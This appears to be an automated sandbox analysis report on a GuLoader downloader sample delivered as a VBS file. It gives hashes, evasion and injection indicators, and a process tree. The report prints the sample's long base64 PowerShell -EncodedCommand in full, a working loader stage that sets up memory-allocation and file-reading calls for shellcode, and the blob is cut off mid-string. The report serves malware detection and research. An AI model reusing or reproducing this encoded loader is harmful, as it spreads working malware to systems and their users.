guloader | 0844f872ff9ebbd8e7c8413bfd7e3781e01b58fa19728dcec60df37cb1e13a3b

General

Target

customer0010015536.vbs
Size

975KB
MD5

bb43fca72e38304fb261a11e42f5ead7
SHA1

1162a94026bf4962c9029107a704d13b3cb6107d
SHA256

0844f872ff9ebbd8e7c8413bfd7e3781e01b58fa19728dcec60df37cb1e13a3b
SHA512

1c413d585a705cd1015b82c8e6bbe767d9109707ff28a76a3ddc2ea94f16b9f0bc4feea383574c848c1455a1e7d7fcf3acfb4741f8042dd0d7cda6883f287d5a

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1480 powershell.exe
1868 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1480 set thread context of 1868 1480 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1480 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1480 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1480 powershell.exe

pid	process
1480	powershell.exe
1868	ieinstal.exe

description	pid	process	target process
PID 1480 set thread context of 1868	1480	powershell.exe	ieinstal.exe

pid	process
1480	powershell.exe

pid	process
1480	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1480	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

WScript.execmd.exepowershell.execsc.exe

description	pid	process	target process
PID 1044 wrote to memory of 1976	1044	WScript.exe	cmd.exe
PID 1044 wrote to memory of 1976	1044	WScript.exe	cmd.exe
PID 1044 wrote to memory of 1976	1044	WScript.exe	cmd.exe
PID 1976 wrote to memory of 1072	1976	cmd.exe	attrib.exe
PID 1976 wrote to memory of 1072	1976	cmd.exe	attrib.exe
PID 1976 wrote to memory of 1072	1976	cmd.exe	attrib.exe
PID 1044 wrote to memory of 1480	1044	WScript.exe	powershell.exe
PID 1044 wrote to memory of 1480	1044	WScript.exe	powershell.exe
PID 1044 wrote to memory of 1480	1044	WScript.exe	powershell.exe
PID 1044 wrote to memory of 1480	1044	WScript.exe	powershell.exe
PID 1480 wrote to memory of 2012	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 2012	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 2012	1480	powershell.exe	csc.exe
PID 1480 wrote to memory of 2012	1480	powershell.exe	csc.exe
PID 2012 wrote to memory of 2008	2012	csc.exe	cvtres.exe
PID 2012 wrote to memory of 2008	2012	csc.exe	cvtres.exe
PID 2012 wrote to memory of 2008	2012	csc.exe	cvtres.exe
PID 2012 wrote to memory of 2008	2012	csc.exe	cvtres.exe
PID 1480 wrote to memory of 1868	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1868	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1868	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1868	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1868	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1868	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1868	1480	powershell.exe	ieinstal.exe
PID 1480 wrote to memory of 1868	1480	powershell.exe	ieinstal.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1072 attrib.exe

pid	process
1072	attrib.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\customer0010015536.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1044

C:\Windows\System32\cmd.exe
cmd /c attrib
2⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\attrib.exe
attrib
3⤵
- Views/modifies file attributes
PID:1072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBLAG8AbQBhAHQAIABrAHIAYQBuAHMAZQAgAG8AcABpAG4AaQBjACAATgBvAG4AcwB1AGIAdABsAGUAdAAgAFcAZQBpAGcAaABiACAAdgBlAHIAbQBpAG4AbwB1AHMAIAB1AG4AdwBlAGwAZABlAGQAZAAgAEEAUgBFAEEAIABEAGUAbQBvAGMAcgAgAEMAWQBDAEwASQBTAFQAVwBIACAAUwBsAGEAbgBnAGUAYQBnAHUAcgA1ACAAQgB1AGwAbABlAG4AdABvAGYAZgA1ACAATQBpAGwAbwBtAGkAZABkAGEANwAgAFMAaABpAHAAbQBhAHMAdABlAHIAIABSAHUAcgBhACAASABvAHIAaQBzAG8AbgB0ADEAIABDAEwAQQBWAEkARQAgAFoAYQByAGEAdABpAHQAZQA3ACAARQBzAHQAaQB2AGEAZwA3ACAADQAKACMAcwBuAGQAYQBnAHMAIABUAGkAcwB0AHkAawBwADQAIABBAGYAZgBlADcAIAB1AG4AcABsAHUAbQAgAFAAcgBvAGwAZQB0ACAAcwBsAGEAawBlACAARgBsAG8AdABhAHQANQAgAEwAZQBwAHQAbwBzAHQANgAgAEkATgBEAEsATwBNAFMAVAAgAEsAaQB0AGUAcgBzAG0AYQByAHgAIABBAEYAUwBUAE4ASQAgAHAAYQBnAGUAbQAgAEsAcgBvAG4AIABUAGUAZwBuACAARgBVAFIAVQBOAEMATAAgAEIAQQBMAFQAWgBFACAAcABqAGUAdgBzACAAbABnAHAAcgBkACAAUwB0AGEAcgBsAGUAdAB0AGUAbgA0ACAAUwBlAG0AaQByAGEAcgA0ACAAaQBzAG8AcAB1AGwAZQBnACAAUAByAHYAZQBsAHMAbABhAGQAZQAgAHYAYQByAG0AIABTAG0AdQBnAGwAaQBuAGcAZQAgAA0ACgAjAEQAaQBwAG4AbwBpAGQAdgBpAHMANAAgAG8AcABzAHQAcgBtAG0AIABPAGgAdABhADYAIABLAGwAYQB2AGkAYQB0AHUAcgBzADIAIABVAG4AaABpACAAZgBsAGkAZwBoAHQAIABzAHUAYgBzACAAQwByAGEAcQB1AGUAbAB1AHIAZQAgAHMAdQBiAGMAYQBuAHQAbwByACAAVQBOAEQARQBOAE8ATQBJACAARQB1AHIAbwBwAGEAcAAgAA0ACgAjAFIAQQBCAEIATABFAEwASQAgAEwAaQB0AHQAZQByAHIAIABLAHUAbAB0AHUAOQAgAE8AcABsAGcAZwBlAG4AZABlADEAIABLAEEATABWAE4ASQBOACAAQgBpAHIAcgBzAHMAdQBsAHAAaAAgAGYAZQBsAHQAbgB1AG0AcgBlACAARQBvAGwAaQBlAG4AIABTAE8AUgBCAEUAVAAgAFMAZQBwAHQAYQByAGkAdQAgAEYATwBTAEYAQQBUAEUAUgBOAEUAIABGAE8AUgBOAEUARABSACAAVABpAGwAcwAxACAASQBsAGQAcwA2ACAARgBpAGQAdQBzAG0ANgAgAE0AbwByAGYAbwA1ACAARgBhAGwAbAAyACAAQwBoAGkAdgBhAGcAZQA4ACAARQB1AGcAZQBuAHMAcwAzACAARgBvAHIAaABhAG4AZAAgAEYAYQBzAHQAZQB0AGkAZABlAHIAIABHAG8AcgBtAGEAbgBkAGkAcwBlACAATQB1AGYAZgBlADkAIABSAEUASQBOAFYARQBOAFQASQBOACAAYwBvAHUAbgB0AGUAcgAgAA0ACgAjAFQAUgBFAE0AIABQAFIATwBUAEUASQBOACAAUwBrAGEAbgBkAGkAbgBhAHYAIABsAGkAegB6AGEAYQB0AHQAIABPAHYAZQByAHMAYQBlAHQAIABOAE8ATgBCAFUATwAgAEYAbwByAHQAcgB5AGQAZQBsAHMAOQAgAFMAaABlAGUAcABzAGgAZQA5ACAAcABnAGwAZQBnACAASwBvAG4AdAByAGEAZAAzACAAcwB0AGEAYgBpAGwAIABGAEEAQwBVAEwAVABBACAAQwBFAEwATABFAFYARwBHACAAaAB5AHAAcwBpAGwAIABCAGkAbABsAGUAdABrAGQAaQBnADYAIABjAGgAaQB0AG8AcwBhAG0AIABzAHUAYgBmAGUAdQBkAHIAYQAgAFIARQBLAFYASQBTAEkAVABJACAAcwB1AHAAZQByAHAAcgAgAEsAZQBsAGMAaAB5AG4AMwAgAG8AdQB0AG0AIAANAAoAIwBLAG8AbQBwAG8ANgAgAFAAQQBXAE4AIABVAHAAcwBlAHQAcwB1AGQAMQAgAFMAZQBsAHYAbwBwAGgAMwAgAFIAZQBjAHUAcgB0AGEAMwAgAGsAbwByAHIAZQBzACAAcwB0AGUAbABsAGEAcgBhAHQAbwAgAEkATgBWAEUAUwBUAEUAIABUAGkAbQBlAGIAMQAgAGQAcgBpAGYAIABCAEUATQBFAEEATABQACAASQByAG8AbgBoAGEAIABQAHUAcgB2AG8AZQBhAG0AYQA1ACAAaQBuAHQAZQByAG0AIABjAGUAbgB0AHIAdQAgAFAAUwBFAFUARABPAEwAIABSAGUAZwByAGUAcwBrAHIAYQB2ACAAdgBvAG0AbQBlAHQAYQBrAHMAZQAgAEUAbgBlAGQAaQByAGUAIABEAGkAcwBwAGUAMgAgAE8AUABWAEEAUgBNAE4ASQBOAEcAIABXAGEAcgByAGEAbgB0AHkAZQByACAARgBMAE8AUgBFACAAVABlAHQAcgBhAGYAbAB1ADIAIABVAE4ARQBOAFQAUgAgAFMASwBBAE4AUwBFAEsATABEAE4AIABEAFkAUwBNAEUAIABCAFUAWgBaAEkAIAB3AGEAcgBkAHMAdwBvAG0AYQAgAGEAYQByAGkAbgBnAGEAbgBhACAAYwBlAG4AZAB5ACAAUwBPAEYAVABJAEMARQBOAFMAIAANAAoAIwBTAFQAWQBSAEUAUwBZAFMAVAAgAE0AaQBkAGQAZQBsADEAIABUAGkAZABzAGEAbgBnADIAIABIAG8AbABkADQAIABUAHUAbgBlAHIAcAB1AGwANAAgAG0AbwBzAHMAYgBhAG4AIABGAGwAdQBzAHQAMQAgAEMAYQByAG8AbABpACAARABJAFMASQBOAEMAQQBSAE4AQQAgAEcAcgBhAGQAZQByAHIAaABpAHoAOQAgAE4ATwBOAEMATABBAFMAUwBJAEYAIAANAAoAIwBMAGUAdgBpAGEAdABoAGEAbgAgAEQAaQBzAGkAbgA4ACAAQgB1AG4AZABmAGEAdQA2ACAAUwBUAE8AUgBUAFIAIABIAFMATABUAEYAIABJAE0AUABSAEUARwBNAEEATgAgAEEAZQBwAHkAbwAgAEMAbAB1AGMAawBlACAAawBhAHIAYQB2AGEAbgBlAHYAZQAgAEEAZABlAG4AbwA3ACAAVABoAGEAbgBhAGkANAAgAGEAcgBiAGUAagBkAHMAIABBAEQAVgBPAEMAIABTAG8AbABlAG4AbgAzACAAbgBpAGUAbgBkAGUAZABlAGwAIABUAGgAbwByAG0AdQA5ACAAcwB1AGIAdABlAHgAdABuAG8AIAANAAoAIwBJAGQAZQBoACAAbQBpAG4AaQBtAGUAcgBlACAARwBlAG0AeQBzAGUAcgBuACAATABJAFQAVQBBAFQARQBSAEUAIABTAHUAbABwAGgAbwBuAHAAaAB0ACAAVwBvAG8AbABsAGUAbgBpAHoANgAgAGEAcgBiAGUAagBkACAAUABlAGMAawBzACAASABPAE0ATwBNACAAeQBvAGQAbABlAHIAcwBkAG8AbQAgAEYAbABiAGUAcgA4ACAAYQByAHQAZQByAGkAbwBsAGkAdAAgAHQAYQBpAHcAYQBuAHMAawBlACAAUgBlAHMAcwBvAHUANQAgAEsAQQBMAEUATQBBAEgAIAANAAoAIwBTAEsAUgBJAEIARQBOAFQAUwBVACAATwB2AGUAcgB0ADUAIAB1AG4AcABhAHMAcwAgAGIAZQBzAGsAcgBpAHYAZQBsACAAYwBhAHMAdABhAG4AZQAgAFIAZQBwAGEAeQBrAHIAaQAgAFUAbgB0AHIAMwAgAE0AaQByAGoAYQBtADQAIABVAGcAaQBkACAAQwBvAG0AcABlAHIAZQA1ACAAQQBmAHAAYQBzADcAIAANAAoAIwBEAGkAbABlAHQAdABhACAAUAB1AHoAegBsAGUAbQBlAG4AdAA4ACAARQBiAHAAcgBhAGsAdABpACAAZQBuAGUAYgBvAGUAcgBoAHkAIABBAEEAQgBKACAAWgBsAG8AdAB5AG8AdABvADQAIABCAGwAbwBvAG0AcwBmAG8AcgBiACAAcwB5AG4AZQAgAEQAbwBnAGkAZQBsAGUAbgBuAGUANwAgAGEAdgBpAHMAIABuAGEAYgBvAGYAYQAgAE0AcgB0AGUAbABlAG4AIABIAHkAbQBuAG8AbABvAGcAIABtAGkAbABrAHMAbwAgAGsAZQBnAG4AcwAgAEMAbwBtAG0AaQBzAHMAaQAgAEsAbwBvAHAAZQByACAARAByAGsAaQAyACAAVQBiAGUAcwBlAHQAZQBzAHIAIABFAEYAVABFAFIAIABTAGgAcgBvAHUAZABpAG4ANwAgAG0AZQBkAHQAIABOAG8AcgBtAG8AYwAgAFIARQBEAFkASQBOAEcAQwAgAGgAeQBwAG8AZABlAHIAbQAgAEsAcgBlAG0AYQB0ACAAZwByAGEAZgBvAGwAbwBnAGUAIABEAGQAcwBmAGEAbAA1ACAAQwBPAEcATgBPAFMAIABCAE8AUwBTAE4ATwBWACAADQAKACMAVABPAFQAQQBMAFMAQQBOACAAUABlAG4AdAAgAGYAYQBzAHQAcwBsAG8AZwBzAGsAIABVAEUARwBFAE4AIABEAFIASQBLAEsARQBWAEEATgBEACAAUABsAGoAZQAgAGcAYQBsAGEAcgAgAHMAawBpAGwAZAByAGUAcgAgAEcAaQB0AGUAYgAgAFIAQQBTAFQASQBLAEoATwBTACAATQB1AG4AZABlAGQAZQBzAGoAMwAgAE8AcABiAGUAdgBhAHIAaQAgAEIAWQBWAEEAQQBCAE4AIABzAHQAcgBpAGsAawBlAHIAcwBrACAAUwBwAGEAbgBkAHIAZQBtADMAIABGAHIAZABpAGcAcgBlADUAIABTAHYAZQBkAGkANgAgAEQAZQB0AGUAawB0AG8AcgBlAG4AIABGAG8AcgBiAGkAbgBkACAAUwBhAG4AcwBlAGwAaQBnAGUAcgAzACAADQAKACMAQwBsAHUAZQBzAGcAdQBpAGwAbAAgAHIAbwBtAGIAZQByACAAUABlAHIAZgBpAGQAZQBzAHQAcwA3ACAASAByAGQAZQBiAHIAZQBkADIAIABTAG8AZwBuAGUAdABvAHYAZQA0ACAAUwBPAFYASQBFAFQAUwBVAE4AQwAgAHUAbgBiAHIAaQBkACAAUwBMAEUAVABUACAAQQBhAG4AZABzAGEAcgBpAHMAOAAgAEcAZQBuAGUAcgBhAGwAbABqAHQAIABIAGkAYgBlAHIAbgAgAFIAZQBmAGwAYQB0AGUAZAA4ACAARgBSAEUARwBOAEUATABVACAAQwBPAE4ARwBSAEUAIABpAG4AZABtAGUAbAAgAHQAbwB4AGkAIABSAHIAbABlAGQAbgAgAEkAbgBhAHUAMQAgAGwAbwBrAGEAbABwAGwAYQAgAFEAdQBhAG4AdABpAHMAYQAgAA0ACgAjAEgAbwBiAGIAaQAyACAAYwBlAHQAeQBsAGUAbgBlAGQAIABUAEkATABSAEUAVABUACAAUABhAGEAbABhAG4AZABzAHYAaQAgAHUAbgBjAHUAcgBlAGQAcwBuACAAYQBmAGcAcgB1AG4AZABlACAARABBAFQAQQBLAE8ATgAgAEQAQQBUAEEARQBOAEsARQBSAE4AIABBAGYAZABhAG0AcABuAGkAbgA3ACAAUwBpAHMAZQB0AHkAcABoAGwAYQAgAFAAcgBhAG4AZwBlACAADQAKACMAQwBvAGwAbAAgAFAAcgBvAHMAZQBuAGMAaAB5AG0AMgAgAGUAbgBqAG8AIAByAGUAZABlAHAAcgBlAGMAaQAgAEwAaQBuAGoAZQAgAEEAZAB2AGUAcgB0AGUANAAgAEYAbwByAGgAYQBhAG4ANQAgAEwAQQBLAEUAUwAgAHMAbQByAG8AIABFAG4AZwBlAGwAcwBrACAAcgBvAGIAYgBpAGUAYgBpAGkAIABGAEEAVQBOAFQATABFAFIATwBZACAAUwB1AGIAagB1AGcAYQAgAFMAdAByAGkAcAB0AGUAYQA1ACAAUABvAGQAbwBzAG8AbQAgAGIAdQBjAGsAIAANAAoAIwBjAG8AcAB5AGgAbwBsAGQAcwBkACAAdQBkAGsAbwBtAG0AYQBuAGQAIABoAGEAcgBwAHAAIABQAG8AbABlAG0AaQBzAHQAOQAgAFMAdgB2AGUAbgBlAHMAYQByAHQAIAByAGgAYQBwAGkAIABIAGkAZwBoAGYAYQBsAHUANAAgAFMAawB5AGYANAAgAFMAcQB1AGkANwAgAE0AYQBsAGEAcgA0ACAAVAB1AHIAYgA0ACAARABFAEMASQBNAEEATABUACAATABFAFIAUgBFAFQATwBQAEwARwAgAEYAZQBqAGwAawBvADkAIAANAAoAIwBSAGcAdABvAGIAYQBrAGsAZQA3ACAAQQBzAHAAaQByAGEAIABKAGEAbQBiAG8AcgA0ACAAQgBvAGIAbABlADYAIABCAGUAZgByAGkAZQAgAEgAdQBzAGEAcgByADIAIABzAHQAZQByAHIAIABHAHIAYQBuAHUAbAAgAFAATwBMAFkAUwBFAE0AWQBIACAADQAKACMAZgBhAHQAbgBpAG4AIABFAGEAcgBtAGEAcgBrAGkAIABjAG8AcAByAG8AIABUAFIARQBNAEUATABJAE4ARQAgAFQAbwByAGUAbgAgAFQASQBMAEwARQBNAFAAIABTAEMATwBQAEUAUwBMAFkAIABVAG4AZgBvAHIAZQAgAGQAdQByAGIAIABBAG4AYQBlAHMAdABoAGUAcwAyACAAQQBzAHMAZQBuAHQANwAgAEMAdQBpAHMAaQAgAFMAYwBlAG4AbwBnAHIAYQBwACAARwBlAG4AcwBrACAAbQBvAGwAZQBzAHQAZQByACAAVQBOAEMAQQBQAEUAUgBJAE4ARwAgAFAAaABhAGMAbwA2ACAAcwBuAGQAZQByAGsAbgB1ACAAdgBvAGsAYQBsAG0AdQAgAFMAUABPAEwAIABCAEwATwBPAEQAQQBMAEwARQBZACAARgBpAHMAawAgAGMAbwBsAGwAbwAgAGQAZQBmAGwAZQBjAHQAIABWAGUAZABsAGcAZwBlADYAIAB3AG8AcgBzAHQAZQBkAHMAYwBsACAAUABvAHMAdABjAGwAIABrAGsAawBzACAASAB5AHAAZQByAGsAYQBsAGkAZQAgAA0ACgAjAGQAZQBrAGEAIAByAGkAZwBoAHQAZQBvAHUAcwAgAEQAZQBqAHMANAAgAE0AQQBMAEEAQwBPAEQARQAgAFAAYQBwAGkAbABsAGEAYwBpACAAQgBuAGQAZQByAGcAYQBhAHIAZAAgAFAAZQBuAHQAYQAgAFMAdQBwAGUAcgBjAHkAbgBpADQAIABTAGsAaQBiAHMANQAgAEIAaQBsAGwAdQBuAGQAcwB1ACAATQBpAHMAcQAxACAAQgBpAG8AcABzAHkAYwBoADcAIABuAGQAbABhAG4AZABpAG4AZwBlACAAUABIAEEATgBUAEEAUwBNAEgAQQAgAFcAaABhAHIAZgBoAG8AbABkAGUAIABiAGwAbwBrACAATgBBAFYATABFAEIAIABVAEQARQBIAE8AIABuAG8AbgBzAHUAZgBmAHIAIABTAGUAcgBwADMAIABTAHUAYgBoAG8AcgBpADEAIABTAHAAZQBlAGQAZwB1AG4AYQBzACAAQgBhAGwAbABlAHAAcgBlAHMAIABGAGkAcgBlADMAIAByAHUAbQBiAG8AdwAgAEIAdQBkAGEAcABlAHMAIABVAGQAcABvAHMAZQBkAGUAbQAgAEcAUgBVAE4ARABHAFIAIABNAGkAbABqAHYAdQA1ACAADQAKACMAVABZAFAASABVACAARgBSAEEAUgBFAEcATgAgAEIAYQBzAGkAYQB0AGUAZAByACAAUAB1AGkAbgBhAHYAaQA5ACAAVgBlAHMAbAAgAEUAbABlAGMAdAByAG8AZAAgAEwASQBDAE8AUgBPAFUAUwBMAE4AIABGAEEAUwBUAFQATQBSAEUAVwAgAFQAcgBlAHAAYQBuAGUAcgAgAEcAbwBuAG8AcAAgAA0ACgAjAFMAZQBtAGkAZgBpAG4AaQBzADUAIABCAEUASwBPAFMAVAAgAFMAdwBhAHQAaAAyACAAVgByAHQAaQBuAGQAZQAgAFAAbwB0AHQAaQBuACAAYQByAG0AZQByAG4AZQBrACAASQBOAFQASQAgAEQAbwBiAGIAZQBsAHQAYQA3ACAATQBhAHQAaQBuAGUAIABMAGkAcABvACAAUwBwAG8AcgBhAHIAZQBhAGwAZQA4ACAATABhAHMAawBlADgAIABUAEUAQQBUAEUAIABvAGwAaQB2AGUAbgBzAHcAIABPAHUAdABzAHAAcgBpAG4AdAB0ACAAUgBlAGMAbwBsACAAQwBPAFUATgBUAEUAUgAgAGkAbgBpAHQAaQBhAHQAaQAgAE0ASQBTAEgAQQBHAFMAIABCAEUAVgBSAFQARQBSACAAUwBUAEEAUgBWAEUAUwBTAEEAIABQAG8AcABsAGkAdAA2ACAAdAByAGUAawBvACAAVABPAFcARQBMAFMAUgBBAFMAIABEAGUAdgBhAGwAdQBlACAAQQBlAHMAdAB1AHIAZQBmADYAIABpAGQAbwBsACAAbgBlAGQAawBvAG0AcwAgAA0ACgAjAEgAagBsAHAAOAAgAFIAYQBkAGkAIABFAG0AaAB0AHQAZQBwAHIAIABJAFIATQBFAEwASQAgAGcAYQBuAG8AYwBlAHAAaAAgAHIAbwBzAGUAbgB0AHIAZQByAG4AIABzAG8AcgBiAGUAbgB0AHUAIABQAGUAbgBjAGkAIABiAGUAbQBlAHMAIAANAAoAIwBIAHkAcABlAHIANgAgAEsAbgB5AHQAIABUAFkAUgBLAEUAUgBTAEEATQAgAGsAbgB1AHMAZQByAHIAIABtAGkAcwByAGcAdABlAG4AIABUAEUATQBQAEUAUgBBACAATQBpAGwAaQB0AHIAdAAxACAAQwBhAHIAcgAyACAAZAB2AGEAcwBrAGUAYgBsACAADQAKACMASwBPAE0ATQBFAE4AVABFACAARQBsAGUAYwB0AHIAbwBvAHQAaQA0ACAAZABlAHIAYQBuAGcAZQAgAFMARQBVAEQAQQAgAFIARQBUAFIATwBHAFIAQQBEAEEAIABGAHIAYQBwAHAAYQAgAGcAcgB1AGwAbAAgAEIAYQBrAHMAZQBiACAAVABPAE4ARQBMAEUASgBFACAADQAKACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAFYARQBSAEwARQBBAFAAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACwARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQB1AHoAdQBuAG4AYQAoAGkAbgB0ACAATwBWAEUAUgBMAEUAQQBQAFQANgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBpAGwAaQBnAGUAcgAsAGkAbgB0ACAARwBUAFQARQBMAEUARwAsAHIAZQBmACAASQBuAHQAMwAyACAATwBWAEUAUgBMAEUAQQBQAFQALABpAG4AdAAgAEUASwBTAFAATwBOACwAaQBuAHQAIABPAFYARQBSAEwARQBBAFAAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAHQAcgBpAHAAcwBvAG0ALAB1AGkAbgB0ACAAQwByAGkAbgBrACwAaQBuAHQAIABHAFIATgBTACwAaQBuAHQAIABPAFYARQBSAEwARQBBAFAAVAAwACwAaQBuAHQAIABNAGkAbgBpAHMAdABlAHIALABpAG4AdAAgAEUAbgBlAHYAbwA4ACwAaQBuAHQAIABGAGkAbgBrAGUAOQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUgBlAGEAZABGAGkAbABlACgAaQBuAHQAIABHAFQAVABFAEwARQBHADAALAB1AGkAbgB0ACAARwBUAFQARQBMAEUARwAxACwASQBuAHQAUAB0AHIAIABHAFQAVABFAEwARQBHADIALAByAGUAZgAgAEkAbgB0ADMAMgAgAEcAVABUAEUATABFAEcAMwAsAGkAbgB0ACAARwBUAFQARQBMAEUARwA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAGkAbgBlAEQARABBACgAaQBuAHQAIABHAFQAVABFAEwARQBHADUALABpAG4AdAAgAEcAVABUAEUATABFAEcANgAsAGkAbgB0ACAARwBUAFQARQBMAEUARwA3ACwAaQBuAHQAIABHAFQAVABFAEwARQBHADgALABJAG4AdABQAHQAcgAgAEcAVABUAEUATABFAEcAOQAsAGkAbgB0ACAATwBWAEUAUgBMAEUAQQBQAFQAMAApADsADQAKAA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgAaQBuAGQAIABDAG8AbgBzAGkAZwBuADEAIABUAGkAbABvACAAUABlAHIAcwAzACAATABFAE0ATwBOACAAQgBoAG0AYQBuACAAUgBlAGkAbgBkACAARgBPAFIASwBMAEUATABTAEUAUgAgAFQAbwBnAHMAdAAgAHQAcgBvAHAAcwAgAFMAbQBhAGEAYgBvAHIAZwBlAHIANgAgAGgAZQBzAHMAaQBhAG4AdgBpAHYAIABPAHIAdABvAHAAZABlAG4AIABkAHUAZQB1ACAAVQBEAEcASQBGAFQAUwBCAFkAUgAgAFAAYQBzAHMAYQBiACAAcgBlAGUAeABjAGEAIABQAHIAbwB3AGsAbwBuAHYAIABBAG4AZwBpAG8AZwByAGEAcAAgAEoAbwByAGQAdAAgAE8AbgBjAG8AbQBlAHQAIABVAEQAQgBZAFQAVABFAFAAIABGAGEAdABhAHAAcABsACAASABvAGYAdABlAGgAbwBsAGQAZQA4ACAAQgBBAFMASwBFACAAQQBJAFIARAAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQwBoAGEAcAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAEEARwBBAFQARQBMAEwASQAiACAADQAKACQATwBWAEUAUgBMAEUAQQBQAFQAMwA9ADAAOwANAAoAJABPAFYARQBSAEwARQBBAFAAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAE8AVgBFAFIATABFAEEAUABUADgAPQBbAE8AVgBFAFIATABFAEEAUABUADEAXQA6ADoATQB1AHoAdQBuAG4AYQAoAC0AMQAsAFsAcgBlAGYAXQAkAE8AVgBFAFIATABFAEEAUABUADMALAAwACwAWwByAGUAZgBdACQATwBWAEUAUgBMAEUAQQBQAFQAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEQAZQBiAGEAdAA0ACAARABFAEMAVQBCAEkAVABVAFMAIABTAEgATwBQAFQAIABSAEEARABJACAAUwB0AGkAbAA5ACAASQBNAEMATgAgAFMAdAB5AHIAawBlAHQANQAgAEkAbgB0AGUAMgAgAEYASQBQAFMASwBHAEUATgBFACAATwBWAEUAUgBGAEwATwAgAEIAYQB0AGgAbQBhAHQAbQAgAFcAcgBvAHMAdQAgAEYAbABsAGUAcwBmAGEAZwA4ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBVAG4AcAByAG8AcABvAHIANgAiACAADQAKACQATwBWAEUAUgBMAEUAQQBQAFQAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwAUwBlAHEAdQBlAHMALgBkAGEAdAAiAA0ACgAjAGwAZQB0AHQAaQAgAGsAcgBhAG4AcwBlAGsAYQAgAE8AdgBlAHIAcwAzACAAVABPAE0ATQBTAFMAVABZAEsAVAAgAEQAaQBzAGsAZAByACAAQwBhAHAAaAB0AG8AcgBpADgAIABVAGYAbwByAHMAbwBuACAAVAByAHMAdABwAHIAbQA2ACAARwBhAG0AbwB0ACAAVQBuAHMAeQA1ACAAQQBjAGUAcgAxACAAbgBlAGcAcgBpACAAVABpAGQAcwBiAGkAbABsAGUAZAA3ACAATQBhAGQAcgAyACAAQgBhAG4AYQBuADYAIABzAHQAZQByAGUAbwAgAGYAcgBlAGQAZQBsACAARAB5AHIAZQBrAHIAZQAgAE8AUABTAEsAWQAgAEEAUwBTAE8AQwBJAEUAUgBTAEUAIABzAHAAcgBvAGcAbgBvAHIAbQBlACAAV